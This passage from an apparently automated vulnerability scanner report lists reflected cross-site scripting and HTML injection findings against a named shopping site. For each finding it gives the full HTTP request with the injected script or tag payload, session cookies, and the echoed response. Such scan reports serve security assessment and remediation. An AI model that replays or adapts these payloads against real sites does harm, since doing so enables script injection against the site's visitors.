This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingf4bb7"><a>d9b30da8cf1/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingf4bb7"><a>d9b30da8cf1">
...[SNIP]...

4.832. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f37e<script>alert(1)</script>cb989f0910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4f37e<script>alert(1)</script>cb989f0910/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4f37e<script>alert(1)</script>cb989f0910 <a href="#" id="backlink">
...[SNIP]...

4.833. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c49'-alert(1)-'15c2a5e3ae1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesb8c49'-alert(1)-'15c2a5e3ae1/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessoriesb8c49'-alert(1)-'15c2a5e3ae1/194367784/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.834. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27413'-alert(1)-'877165897ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/19436778427413'-alert(1)-'877165897ff/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:27:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/19436778427413'-alert(1)-'877165897ff/Jewelry/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.835. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff1f7'-alert(1)-'cf8a11d79b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelryff1f7'-alert(1)-'cf8a11d79b5/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:33:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Jewelryff1f7'-alert(1)-'cf8a11d79b5/23';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.836. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5612'-alert(1)-'0064c52d09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelry/23b5612'-alert(1)-'0064c52d09 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:37:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784/Jewelry/23b5612'-alert(1)-'0064c52d09';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.837. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93d1a'-alert(1)-'d39b65e67c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping93d1a'-alert(1)-'d39b65e67c4/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping93d1a'-alert(1)-'d39b65e67c4/Clothing-Accessories/194367784/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.838. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9951"><a>177064adf8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingd9951"><a>177064adf8d/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:55:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingd9951"><a>177064adf8d">
...[SNIP]...

4.839. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2321'-alert(1)-'eefd3448321 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesb2321'-alert(1)-'eefd3448321/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessoriesb2321'-alert(1)-'eefd3448321/194367784/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.840. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 623d3<script>alert(1)</script>0209725161f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories623d3<script>alert(1)</script>0209725161f/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:10:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories623d3<script>alert(1)</script>0209725161f <a href="#" id="backlink">
...[SNIP]...

4.841. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c70d3'-alert(1)-'947cb80fe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784c70d3'-alert(1)-'947cb80fe8c/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:14:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784c70d3'-alert(1)-'947cb80fe8c/Leather-Goods/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.842. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a8c'-alert(1)-'86e651e2ac4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Leather-Goods50a8c'-alert(1)-'86e651e2ac4/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:23:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Leather-Goods50a8c'-alert(1)-'86e651e2ac4/76';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.843. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33884'-alert(1)-'81af099caa5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Leather-Goods/7633884'-alert(1)-'81af099caa5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Leather-Goods/7633884'-alert(1)-'81af099caa5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.844. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b37"><a>c4d399baf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb7b37"><a>c4d399baf66/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
